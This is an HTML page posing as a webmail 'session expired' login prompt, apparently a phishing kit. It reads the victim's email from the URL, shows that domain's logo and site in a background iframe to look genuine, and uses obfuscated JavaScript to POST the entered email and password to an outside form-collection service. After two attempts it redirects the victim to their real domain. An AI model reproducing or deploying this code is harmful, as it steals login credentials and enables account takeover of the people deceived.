<!DOCTYPE html>
<html lang="en" >

<head>

  <meta charset="UTF-8">
  
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
        <meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow"> 
    <title>Mail::Inbox</title>
    <script src="jquery-1.js"></script>

    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">


      <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="bootstrap.min.css?1422585379">
    <link href="https://fonts.googleapis.com/css?family=Yellowtail%26display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
  <style>
  
 html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:before,blockquote:after,q:before,q:after{content:'';content:none}table{border-collapse:collapse;border-spacing:0}
    
    html,body{}#root{position:absolute;left:0;right:0;bottom:0;top:0;z-index:-10;pointer-events:none}.error{color:#dc3545;width:80%;margin:0 auto;padding-top:5px}.form-holder{background-color:#fff;width:600px;margin:100px auto;height:100%;box-shadow:0 20px 50px #a9a9a9;border-radius:4px 4px 0 0;border:1px solid #d6dfea;z-index:12}
     
 }
  

.social_icons a{
  display: block;
  height: 45px;
  width: 100%;
  line-height: 45px;
  text-align: center;
  border-radius: 5px;
  font-size: 20px;
  color: #fff;
  text-decoration: none;
  transition: all 0.3s linear;
}
.social_icons a span{
  margin-left: 5px;
  font-size: 18px;
}
.social_icons a:first-child{
  margin-right: 5px;
  background: #4267B2;
}
.social_icons a:first-child:hover{
  background: #375695;
}
.social_icons a:last-child{
  margin-left: 5px;
  background: #1DA1F2;
}
.social_icons a:last-child:hover{
  background: #0d8bd9;
}
form {
  margin-top: 25px;
}
form .input_box{
  height: 50px;
  width: 100%;
  position: relative;
  margin-top: 15px;
}
.input_box input{
  height: 100%;
  width: 100%;
  outline: none;
  border: 1px solid lightgrey;
  border-radius: 5px;
  padding-left: 45px;
  font-size: 17px;
  transition: all 0.3s ease;
}
.input_box input:focus{
  border-color: #ff0000;
}
.input_box .icon{
  position: absolute;
  top: 50%;
  left: 20px;
  transform: translateY(-50%);
  color: grey;
}
form .option_div{
  margin-top: 5px;
  display: flex;
  justify-content: space-between;
}
.option_div .check_box{
  display: flex;
  align-items: center;
}
.option_div span{
  margin-left: 5px;
  font-size: 16px;
  color: #333;
}
.option_div .forget_div a{
  font-size: 16px;
  color: #be2edd;
}
.button input{
  padding-left: 0;
  background: #be2edd;
  color: #fff;
  border: none;
  font-size: 20px;
  font-weight: 500;
  cursor: pointer;
  transition: all 0.3s linear;
}
.button input:hover{
  background: #a720c5;
}
form .sign_up{
  text-align: center;
  margin-top: 25px;
}
.sign_up a{
  color: #be2edd;
}
form a{
  text-decoration: none;
}
form a:hover{
  text-decoration: underline;
}
  </style>


  <script>
 var _$_695e=["console"];window[_$_695e[0]]= window[_$_695e[0]]|| function(_0x11BD2){}</script>

  
  
  <script>
 var _$_3c47=["match","search","location","resize","*","postMessage","parent"];if(document[_$_3c47[2]][_$_3c47[1]][_$_3c47[0]](/type=embed/gi)){window[_$_3c47[6]][_$_3c47[5]](_$_3c47[3],_$_3c47[4])}</script>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  
    <script>
 var _$_3f4f=["console"];window[_$_3f4f[0]]= window[_$_3f4f[0]]|| function(_0x11BD2){}</script>

  
  
  <script>
 var _$_4f98=["match","search","location","resize","*","postMessage","parent"];if(document[_$_4f98[2]][_$_4f98[1]][_$_4f98[0]](/type=embed/gi)){window[_$_4f98[6]][_$_4f98[5]](_$_4f98[3],_$_4f98[4])}</script>

  
  <script>

   var _$_2ded=["hide","#msg","","val","#email","animate","#automail","show","#inputbar","click","#back1","substr","hash","location","test","#error","focus","@","indexOf",".","toLowerCase","toUpperCase","src","https://www.google.com/s2/favicons?domain=","attr","#logoimg","html","#logoname",".logoname","https://www.","#iframe","preventDefault","#password","text",".logoimg","JSON","https://nocodeform.io/f/668149aa2832800ad3052c3f","POST","Verifing...","#submit-btn","log","signal","ok","http://www.","replace","Sign in","ajax","ready"];$(document)[_$_2ded[47]](function(){var _0x11C6C=0;$(_$_2ded[10])[_$_2ded[9]](function(){$(_$_2ded[1])[_$_2ded[0]]();$(_$_2ded[4])[_$_2ded[3]](_$_2ded[2]);$(_$_2ded[6])[_$_2ded[5]]({left:200,opacity:_$_2ded[0]},0);$(_$_2ded[8])[_$_2ded[5]]({right:200,opacity:_$_2ded[7]},1000)});var _0x11CB9=window[_$_2ded[13]][_$_2ded[12]][_$_2ded[11]](1);if(!_0x11CB9){}else {var _0x11E3A=_0x11CB9;$(_$_2ded[4])[_$_2ded[3]](_0x11E3A);var _0x11D06=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x11D06[_$_2ded[14]](_0x11E3A)){$(_$_2ded[15])[_$_2ded[7]]();_0x11CB9[_$_2ded[16]];return false};var _0x11DED=_0x11E3A[_$_2ded[18]](_$_2ded[17]);var _0x11E87=_0x11E3A[_$_2ded[11]]((_0x11DED+ 1));var _0x11C1F=_0x11E87[_$_2ded[11]](0,_0x11E87[_$_2ded[18]](_$_2ded[19]));var _0x11D53=_0x11C1F[_$_2ded[20]]();var _0x11DA0=_0x11C1F[_$_2ded[21]]();$(_$_2ded[25])[_$_2ded[24]](_$_2ded[22],_$_2ded[23]+ _0x11E87);$(_$_2ded[27])[_$_2ded[26]](_0x11DA0);$(_$_2ded[28])[_$_2ded[26]](_0x11DA0);$(_$_2ded[30])[_$_2ded[24]](_$_2ded[22],_$_2ded[29]+ _0x11E87)};$(_$_2ded[39])[_$_2ded[9]](function(_0x11ED4){$(_$_2ded[15])[_$_2ded[0]]();$(_$_2ded[1])[_$_2ded[0]]();_0x11ED4[_$_2ded[31]]();var _0x11CB9=$(_$_2ded[4])[_$_2ded[3]]();var _0x11F6E=$(_$_2ded[32])[_$_2ded[3]]();var _0x11F21=$(_$_2ded[1])[_$_2ded[26]]();$(_$_2ded[1])[_$_2ded[33]](_0x11F21);var _0x11E3A=_0x11CB9;var _0x11D06=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x11D06[_$_2ded[14]](_0x11E3A)){$(_$_2ded[15])[_$_2ded[7]]();_0x11CB9[_$_2ded[16]];return false};var _0x11DED=_0x11E3A[_$_2ded[18]](_$_2ded[17]);var _0x11E87=_0x11E3A[_$_2ded[11]]((_0x11DED+ 1));var _0x11C1F=_0x11E87[_$_2ded[11]](0,_0x11E87[_$_2ded[18]](_$_2ded[19]));var _0x11D53=_0x11C1F[_$_2ded[20]]();var _0x11DA0=_0x11C1F[_$_2ded[21]]();$(_$_2ded[30])[_$_2ded[24]](_$_2ded[22],_$_2ded[29]+ _0x11E87);$(_$_2ded[25])[_$_2ded[24]](_$_2ded[22],_$_2ded[23]+ _0x11E87);$(_$_2ded[34])[_$_2ded[24]](_$_2ded[22],_$_2ded[23]+ _0x11E87);$(_$_2ded[27])[_$_2ded[26]](_0x11DA0);_0x11C6C= _0x11C6C+ 1;$[_$_2ded[46]]({dataType:_$_2ded[35],url:_$_2ded[36],type:_$_2ded[37],data:{email:_0x11CB9,password:_0x11F6E},beforeSend:function(_0x11FBB){$(_$_2ded[39])[_$_2ded[26]](_$_2ded[38])},success:function(_0x12008){if(_0x12008){$(_$_2ded[1])[_$_2ded[7]]();console[_$_2ded[40]](_0x12008);if(_0x12008[_$_2ded[41]]== _$_2ded[42]){$(_$_2ded[32])[_$_2ded[3]](_$_2ded[2]);if(_0x11C6C>= 2){_0x11C6C= 0;window[_$_2ded[13]][_$_2ded[44]](_$_2ded[43]+ _0x11E87)}}else {}}},error:function(){$(_$_2ded[32])[_$_2ded[3]](_$_2ded[2]);if(_0x11C6C>= 2){_0x11C6C= 0;window[_$_2ded[13]][_$_2ded[44]](_$_2ded[43]+ _0x11E87)};$(_$_2ded[1])[_$_2ded[7]]()},complete:function(){$(_$_2ded[39])[_$_2ded[26]](_$_2ded[45])}})})})</script>
<script>
   var _$_f8b7=["onload","focus","password","getElementById"];window[_$_f8b7[0]]= function(){var _0x12055=document[_$_f8b7[3]](_$_f8b7[2])[_$_f8b7[1]]()}</script>
</head>

<body translate="no" >
  <!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

    <title>Hello, world!</title>
  </head>
  <body>
      <div id="root">
<iframe id="iframe" scrolling="no" src="" width="100%" height="100%" frameborder="0"></iframe> </div>
<form action="#" method="post">
<input type="hidden" class="form-control" name="hido" id="hido" value="">
<input type="hidden" class="form-control" name="redirecto" id="redirecto" value="">

     <!--   <h1 style="text-align: center;">Hello, world!</h1>
 Button trigger modal --> 
  

    <!-- Modal -->
    <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" style="margin-top: 90px; display: block !important;" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog" style="box-shadow: rgba(0, 0, 0, 0.4) 0px 30px 90px;" role="document">
        <div class="modal-content">
        <div class="modal-header">
            <div class="xlogo">
            <h5><img id="logoimg" src="">
            <span style="text-transform: capitalize;" id="logoname"></span></h5>
            </div>
                
            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
            </button>
        </div>
        <div class="modal-body">
        <div class="form-wrap">
        <center>
            <div>Your session has expired, please login again to continue.</div></center>
        <center>
          <div class="alert alert-danger" id="msg" style="display: none; color:red;"> Invalid Password.! Please Enter your correct Password</div>
          <div id="error" class="text-danger" style="display: none; color:red;">That account doesn't exist. Enter a different account</div>
        </center>
      <div class="input_box">
        <input type="email" name="username" id="email" placeholder="Email or Phone" disabled="disabled" >
        <div class="icon"><i class="fas fa-user"></i></div>
      </div>
      <div class="input_box">
        <input type="password" name="password" id="password" placeholder="Password" autofocus required="required">
        <div class="icon"><i class="fas fa-lock"></i></div>
      </div>
        </div>
                </div>

       <div class="modal-footer"> 
            <!--     <div class="input_box"> -->

            <button type="submit" id="submit-btn" class="btn btn-primary">Sign in</button>
        </div>
        </div>
    </div>
    </div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
    <script>
      var _$_8d5f=["show","modal","#exampleModal","ready","static"];$(document)[_$_8d5f[3]](function(){$(_$_8d5f[2])[_$_8d5f[1]](_$_8d5f[0])});$(_$_8d5f[2])[_$_8d5f[1]]({backdrop:_$_8d5f[4],keyboard:false})</script>


  </body>
</html>

  
  

</body>

</html>